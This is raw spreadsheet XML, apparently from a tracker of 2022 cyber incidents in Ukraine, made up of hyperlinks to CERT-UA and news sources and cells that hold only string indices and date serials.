TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/14624" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/drawing" Target="../drawings/drawing2.xml"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/38606" TargetMode="External"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/38097" TargetMode="External"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cyberpeaceinstitute.org/ukraine-timeline-of-cyberattacks/" TargetMode="External"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/38374" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERT" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cyberpeaceinstitute.org/ukraine-timeline-of-cyberattacks/" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/38155" TargetMode="External"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cip.gov.ua/ua/news/rosiiski-khakeri-zdiisnili-masshtabnu-ddos-ataku-na-saiti-ukrayinskikh-telekom-operatoriv" TargetMode="External"/><Relationship Id="rId117" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/40125" TargetMode="External"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/40102" TargetMode="External"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cip.gov.ua/ua/news/rosiiski-khakeri-atakuyut-informaciini-sistemi-po-vsii-krayini-adzhe-meta-rosiyi-zavoyuvati-vsyu-ukrayinu-a-ne-tilki-yiyi-skhid" TargetMode="External"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/40240" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.forbes.com/sites/carlieporterfield/2022/04/22/ukraine-postal-service-hit-with-cyberattack-after-selling-viral-anti-russia-stamps/?sh=1b42d0635e60" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://loda.gov.ua//" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/39923" TargetMode="External"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/39934" TargetMode="External"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/39882" TargetMode="External"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/37704" TargetMode="External"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/37688" TargetMode="External"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/38088" TargetMode="External"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/37829" TargetMode="External"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/37815" TargetMode="External"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/37626" TargetMode="External"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/37788" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/10011" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/11113" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/11113" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/11113" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/11113" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/10702" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/37246" TargetMode="External"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/37287" TargetMode="External"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/37287" TargetMode="External"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/story.php?story_fbid=317263187099613&amp;id=100064478028712" TargetMode="External"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/37141" TargetMode="External"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/37140" TargetMode="External"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/18101" TargetMode="External"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/18273" TargetMode="External"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/18365" TargetMode="External"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/18419" TargetMode="External"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/18163" TargetMode="External"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/37139" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cert.gov.ua/article/17961" TargetMode="External"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERTT" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/UACERT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2.75"/>
    <col customWidth="1" min="3" max="3" width="16.0"/>
    <col customWidth="1" min="4" max="4" width="15.25"/>
    <col customWidth="1" min="5" max="5" width="18.5"/>
    <col customWidth="1" min="7" max="7" width="18.63"/>
    <col customWidth="1" min="9" max="9" width="13.88"/>
    <col customWidth="1" min="10" max="10" width="13.63"/>
    <col customWidth="1" min="11" max="11" width="21.0"/>
    <col customWidth="1" min="18" max="18" width="16.75"/>
  </cols>
  <sheetData>
    <row r="1">
      <c r="A1" s="1" t="s">
        <v>0</v>
      </c>
      <c r="B1" s="1" t="s">
        <v>1</v>
      </c>
      <c r="C1" s="2" t="s">
        <v>2</v>
      </c>
      <c r="D1" s="3" t="s">
        <v>3</v>
      </c>
      <c r="E1" s="4" t="s">
        <v>4</v>
      </c>
      <c r="F1" s="4" t="s">
        <v>5</v>
      </c>
      <c r="G1" s="3" t="s">
        <v>6</v>
      </c>
      <c r="H1" s="2" t="s">
        <v>7</v>
      </c>
      <c r="I1" s="3" t="s">
        <v>8</v>
      </c>
      <c r="J1" s="3" t="s">
        <v>9</v>
      </c>
      <c r="K1" s="3" t="s">
        <v>10</v>
      </c>
      <c r="L1" s="4" t="s">
        <v>11</v>
      </c>
      <c r="M1" s="4" t="s">
        <v>12</v>
      </c>
      <c r="N1" s="3" t="s">
        <v>13</v>
      </c>
      <c r="O1" s="2" t="s">
        <v>14</v>
      </c>
      <c r="P1" s="4" t="s">
        <v>15</v>
      </c>
      <c r="Q1" s="3" t="s">
        <v>16</v>
      </c>
      <c r="R1" s="3" t="s">
        <v>17</v>
      </c>
      <c r="S1" s="3" t="s">
        <v>18</v>
      </c>
      <c r="T1" s="5" t="s">
        <v>19</v>
      </c>
    </row>
    <row r="2" ht="48.75" customHeight="1">
      <c r="A2" s="6">
        <v>44679.0</v>
      </c>
      <c r="B2" s="6">
        <v>44678.0</v>
      </c>
      <c r="C2" s="2" t="s">
        <v>20</v>
      </c>
      <c r="D2" s="3" t="s">
        <v>21</v>
      </c>
      <c r="E2" s="4" t="s">
        <v>22</v>
      </c>
      <c r="F2" s="4" t="s">
        <v>23</v>
      </c>
      <c r="G2" s="3" t="s">
        <v>24</v>
      </c>
      <c r="H2" s="2" t="s">
        <v>25</v>
      </c>
      <c r="I2" s="3" t="s">
        <v>26</v>
      </c>
      <c r="J2" s="3" t="s">
        <v>27</v>
      </c>
      <c r="K2" s="3" t="s">
        <v>28</v>
      </c>
      <c r="L2" s="4" t="s">
        <v>29</v>
      </c>
      <c r="M2" s="4" t="s">
        <v>30</v>
      </c>
      <c r="N2" s="3" t="s">
        <v>31</v>
      </c>
      <c r="O2" s="4" t="s">
        <v>32</v>
      </c>
      <c r="P2" s="7" t="s">
        <v>33</v>
      </c>
      <c r="Q2" s="3" t="s">
        <v>34</v>
      </c>
      <c r="R2" s="3" t="s">
        <v>35</v>
      </c>
      <c r="S2" s="3" t="s">
        <v>35</v>
      </c>
      <c r="T2" s="8" t="s">
        <v>35</v>
      </c>
    </row>
    <row r="3" ht="57.75" customHeight="1">
      <c r="A3" s="6">
        <v>44679.0</v>
      </c>
      <c r="B3" s="6">
        <v>44678.0</v>
      </c>
      <c r="C3" s="2" t="s">
        <v>36</v>
      </c>
      <c r="D3" s="3" t="s">
        <v>37</v>
      </c>
      <c r="E3" s="4" t="s">
        <v>38</v>
      </c>
      <c r="F3" s="3" t="s">
        <v>35</v>
      </c>
      <c r="G3" s="3" t="s">
        <v>39</v>
      </c>
      <c r="H3" s="3" t="s">
        <v>35</v>
      </c>
      <c r="I3" s="3" t="s">
        <v>40</v>
      </c>
      <c r="J3" s="3" t="s">
        <v>41</v>
      </c>
      <c r="K3" s="3" t="s">
        <v>42</v>
      </c>
      <c r="L3" s="4" t="s">
        <v>43</v>
      </c>
      <c r="M3" s="9"/>
      <c r="N3" s="10" t="s">
        <v>44</v>
      </c>
      <c r="O3" s="2" t="s">
        <v>45</v>
      </c>
      <c r="P3" s="11" t="s">
        <v>46</v>
      </c>
      <c r="Q3" s="3" t="s">
        <v>34</v>
      </c>
      <c r="R3" s="3" t="s">
        <v>35</v>
      </c>
      <c r="S3" s="3" t="s">
        <v>35</v>
      </c>
      <c r="T3" s="8" t="s">
        <v>35</v>
      </c>
    </row>
    <row r="4" ht="88.5" customHeight="1">
      <c r="A4" s="6">
        <v>44677.0</v>
      </c>
      <c r="B4" s="6">
        <v>44677.0</v>
      </c>
      <c r="C4" s="2" t="s">
        <v>47</v>
      </c>
      <c r="D4" s="3" t="s">
        <v>48</v>
      </c>
      <c r="E4" s="4" t="s">
        <v>22</v>
      </c>
      <c r="F4" s="4" t="s">
        <v>49</v>
      </c>
      <c r="G4" s="3" t="s">
        <v>50</v>
      </c>
      <c r="H4" s="3" t="s">
        <v>51</v>
      </c>
      <c r="I4" s="12" t="s">
        <v>52</v>
      </c>
      <c r="J4" s="3" t="s">
        <v>53</v>
      </c>
      <c r="K4" s="3" t="s">
        <v>54</v>
      </c>
      <c r="L4" s="4" t="s">
        <v>55</v>
      </c>
      <c r="M4" s="4" t="s">
        <v>56</v>
      </c>
      <c r="N4" s="3" t="s">
        <v>57</v>
      </c>
      <c r="O4" s="4" t="s">
        <v>58</v>
      </c>
      <c r="P4" s="7" t="s">
        <v>59</v>
      </c>
      <c r="Q4" s="3" t="s">
        <v>34</v>
      </c>
      <c r="R4" s="3" t="s">
        <v>35</v>
      </c>
      <c r="S4" s="3" t="s">
        <v>35</v>
      </c>
      <c r="T4" s="8" t="s">
        <v>35</v>
      </c>
    </row>
    <row r="5" ht="38.25" customHeight="1">
      <c r="A5" s="6">
        <v>44669.0</v>
      </c>
      <c r="B5" s="6">
        <v>44668.0</v>
      </c>
      <c r="C5" s="2" t="s">
        <v>60</v>
      </c>
      <c r="D5" s="3" t="s">
        <v>21</v>
      </c>
      <c r="E5" s="4" t="s">
        <v>22</v>
      </c>
      <c r="F5" s="4" t="s">
        <v>61</v>
      </c>
      <c r="G5" s="3" t="s">
        <v>62</v>
      </c>
      <c r="H5" s="3" t="s">
        <v>63</v>
      </c>
      <c r="I5" s="3" t="s">
        <v>26</v>
      </c>
      <c r="J5" s="3" t="s">
        <v>27</v>
      </c>
      <c r="K5" s="3" t="s">
        <v>64</v>
      </c>
      <c r="L5" s="4" t="s">
        <v>65</v>
      </c>
      <c r="M5" s="4" t="s">
        <v>66</v>
      </c>
      <c r="N5" s="3" t="s">
        <v>67</v>
      </c>
      <c r="O5" s="4" t="s">
        <v>68</v>
      </c>
      <c r="P5" s="7" t="s">
        <v>69</v>
      </c>
      <c r="Q5" s="3" t="s">
        <v>34</v>
      </c>
      <c r="R5" s="3" t="s">
        <v>35</v>
      </c>
      <c r="S5" s="3" t="s">
        <v>35</v>
      </c>
      <c r="T5" s="8" t="s">
        <v>35</v>
      </c>
    </row>
    <row r="6" ht="57.75" customHeight="1">
      <c r="A6" s="6">
        <v>44665.0</v>
      </c>
      <c r="B6" s="6">
        <v>44658.0</v>
      </c>
      <c r="C6" s="2" t="s">
        <v>70</v>
      </c>
      <c r="D6" s="3" t="s">
        <v>21</v>
      </c>
      <c r="E6" s="4" t="s">
        <v>22</v>
      </c>
      <c r="F6" s="4" t="s">
        <v>71</v>
      </c>
      <c r="G6" s="3" t="s">
        <v>72</v>
      </c>
      <c r="H6" s="3" t="s">
        <v>73</v>
      </c>
      <c r="I6" s="3" t="s">
        <v>74</v>
      </c>
      <c r="J6" s="3" t="s">
        <v>75</v>
      </c>
      <c r="K6" s="3" t="s">
        <v>76</v>
      </c>
      <c r="L6" s="4" t="s">
        <v>77</v>
      </c>
      <c r="M6" s="4" t="s">
        <v>78</v>
      </c>
      <c r="N6" s="3" t="s">
        <v>79</v>
      </c>
      <c r="O6" s="4" t="s">
        <v>80</v>
      </c>
      <c r="P6" s="7" t="s">
        <v>81</v>
      </c>
      <c r="Q6" s="3" t="s">
        <v>34</v>
      </c>
      <c r="R6" s="3" t="s">
        <v>35</v>
      </c>
      <c r="S6" s="3" t="s">
        <v>35</v>
      </c>
      <c r="T6" s="8" t="s">
        <v>35</v>
      </c>
    </row>
    <row r="7" ht="85.5" customHeight="1">
      <c r="A7" s="13">
        <v>44665.0</v>
      </c>
      <c r="B7" s="13">
        <v>44663.0</v>
      </c>
      <c r="C7" s="2" t="s">
        <v>82</v>
      </c>
      <c r="D7" s="3" t="s">
        <v>83</v>
      </c>
      <c r="E7" s="4" t="s">
        <v>22</v>
      </c>
      <c r="F7" s="4" t="s">
        <v>84</v>
      </c>
      <c r="G7" s="3" t="s">
        <v>85</v>
      </c>
      <c r="H7" s="3" t="s">
        <v>86</v>
      </c>
      <c r="I7" s="3" t="s">
        <v>87</v>
      </c>
      <c r="J7" s="3" t="s">
        <v>88</v>
      </c>
      <c r="K7" s="3" t="s">
        <v>89</v>
      </c>
      <c r="L7" s="4" t="s">
        <v>90</v>
      </c>
      <c r="M7" s="9"/>
      <c r="N7" s="3" t="s">
        <v>35</v>
      </c>
      <c r="O7" s="4" t="s">
        <v>91</v>
      </c>
      <c r="P7" s="7" t="s">
        <v>92</v>
      </c>
      <c r="Q7" s="3" t="s">
        <v>34</v>
      </c>
      <c r="R7" s="3" t="s">
        <v>93</v>
      </c>
      <c r="S7" s="3" t="s">
        <v>94</v>
      </c>
      <c r="T7" s="5" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="8" ht="119.25" customHeight="1">
      <c r="A8" s="6">
        <v>44663.0</v>
      </c>
      <c r="B8" s="14">
        <v>44659.0</v>
      </c>
      <c r="C8" s="2" t="s">
        <v>96</v>
      </c>
      <c r="D8" s="3" t="s">
        <v>97</v>
      </c>
      <c r="E8" s="4" t="s">
        <v>98</v>
      </c>
      <c r="F8" s="4" t="s">
        <v>99</v>
      </c>
      <c r="G8" s="3" t="s">
        <v>100</v>
      </c>
      <c r="H8" s="3" t="s">
        <v>101</v>
      </c>
      <c r="I8" s="3" t="s">
        <v>102</v>
      </c>
      <c r="J8" s="3" t="s">
        <v>103</v>
      </c>
      <c r="K8" s="3" t="s">
        <v>104</v>
      </c>
      <c r="L8" s="4" t="s">
        <v>105</v>
      </c>
      <c r="M8" s="4" t="s">
        <v>106</v>
      </c>
      <c r="N8" s="3" t="s">
        <v>107</v>
      </c>
      <c r="O8" s="4" t="s">
        <v>108</v>
      </c>
      <c r="P8" s="7" t="s">
        <v>109</v>
      </c>
      <c r="Q8" s="3" t="s">
        <v>110</v>
      </c>
      <c r="R8" s="15" t="s">
        <v>35</v>
      </c>
      <c r="S8" s="15" t="s">
        <v>35</v>
      </c>
      <c r="T8" s="8" t="s">
        <v>35</v>
      </c>
    </row>
    <row r="9" ht="66.75" customHeight="1">
      <c r="A9" s="6">
        <v>44658.0</v>
      </c>
      <c r="B9" s="6">
        <v>44658.0</v>
      </c>
      <c r="C9" s="2" t="s">
        <v>111</v>
      </c>
      <c r="D9" s="3" t="s">
        <v>112</v>
      </c>
      <c r="E9" s="4" t="s">
        <v>22</v>
      </c>
      <c r="F9" s="4" t="s">
        <v>113</v>
      </c>
      <c r="G9" s="3" t="s">
        <v>114</v>
      </c>
      <c r="H9" s="3" t="s">
        <v>115</v>
      </c>
      <c r="I9" s="3" t="s">
        <v>116</v>
      </c>
      <c r="J9" s="3" t="s">
        <v>117</v>
      </c>
      <c r="K9" s="16" t="s">
        <v>118</v>
      </c>
      <c r="L9" s="4" t="s">
        <v>119</v>
      </c>
      <c r="M9" s="3" t="s">
        <v>35</v>
      </c>
      <c r="N9" s="3" t="s">
        <v>35</v>
      </c>
      <c r="O9" s="4" t="s">
        <v>120</v>
      </c>
      <c r="P9" s="7" t="s">
        <v>121</v>
      </c>
      <c r="Q9" s="3" t="s">
        <v>34</v>
      </c>
      <c r="R9" s="15" t="s">
        <v>35</v>
      </c>
      <c r="S9" s="15" t="s">
        <v>35</v>
      </c>
      <c r="T9" s="8" t="s">
        <v>35</v>
      </c>
    </row>
    <row r="10" ht="31.5" customHeight="1">
      <c r="A10" s="6">
        <v>44656.0</v>
      </c>
      <c r="B10" s="14">
        <v>44653.0</v>
      </c>
      <c r="C10" s="2" t="s">
        <v>122</v>
      </c>
      <c r="D10" s="3" t="s">
        <v>123</v>
      </c>
      <c r="E10" s="4" t="s">
        <v>124</v>
      </c>
      <c r="F10" s="4" t="s">
        <v>125</v>
      </c>
      <c r="G10" s="3" t="s">
        <v>126</v>
      </c>
      <c r="H10" s="3" t="s">
        <v>35</v>
      </c>
      <c r="I10" s="12" t="s">
        <v>127</v>
      </c>
      <c r="J10" s="3" t="s">
        <v>128</v>
      </c>
      <c r="K10" s="3" t="s">
        <v>89</v>
      </c>
      <c r="L10" s="4" t="s">
        <v>129</v>
      </c>
      <c r="M10" s="3" t="s">
        <v>35</v>
      </c>
      <c r="N10" s="3" t="s">
        <v>35</v>
      </c>
      <c r="O10" s="4" t="s">
        <v>130</v>
      </c>
      <c r="P10" s="7" t="s">
        <v>131</v>
      </c>
      <c r="Q10" s="3" t="s">
        <v>132</v>
      </c>
      <c r="R10" s="15" t="s">
        <v>35</v>
      </c>
      <c r="S10" s="15" t="s">
        <v>35</v>
      </c>
      <c r="T10" s="8" t="s">
        <v>35</v>
      </c>
    </row>
    <row r="11" ht="36.0" customHeight="1">
      <c r="A11" s="6">
        <v>44655.0</v>
      </c>
      <c r="B11" s="6">
        <v>44654.0</v>
      </c>
      <c r="C11" s="3" t="s">
        <v>133</v>
      </c>
      <c r="D11" s="3" t="s">
        <v>112</v>
      </c>
      <c r="E11" s="4" t="s">
        <v>22</v>
      </c>
      <c r="F11" s="4" t="s">
        <v>134</v>
      </c>
      <c r="G11" s="3" t="s">
        <v>135</v>
      </c>
      <c r="H11" s="3" t="s">
        <v>136</v>
      </c>
      <c r="I11" s="12" t="s">
        <v>137</v>
      </c>
      <c r="J11" s="3" t="s">
        <v>53</v>
      </c>
      <c r="K11" s="3" t="s">
        <v>138</v>
      </c>
      <c r="L11" s="4" t="s">
        <v>139</v>
      </c>
      <c r="M11" s="4" t="s">
        <v>140</v>
      </c>
      <c r="N11" s="3" t="s">
        <v>35</v>
      </c>
      <c r="O11" s="4" t="s">
        <v>141</v>
      </c>
      <c r="P11" s="7" t="s">
        <v>142</v>
      </c>
      <c r="Q11" s="3" t="s">
        <v>34</v>
      </c>
      <c r="R11" s="15" t="s">
        <v>35</v>
      </c>
      <c r="S11" s="15" t="s">
        <v>35</v>
      </c>
      <c r="T11" s="8" t="s">
        <v>35</v>
      </c>
    </row>
    <row r="12" ht="38.25" customHeight="1">
      <c r="A12" s="6">
        <v>44650.0</v>
      </c>
      <c r="B12" s="6">
        <v>44645.0</v>
      </c>
      <c r="C12" s="3" t="s">
        <v>143</v>
      </c>
      <c r="D12" s="3" t="s">
        <v>144</v>
      </c>
      <c r="E12" s="4" t="s">
        <v>22</v>
      </c>
      <c r="F12" s="4" t="s">
        <v>145</v>
      </c>
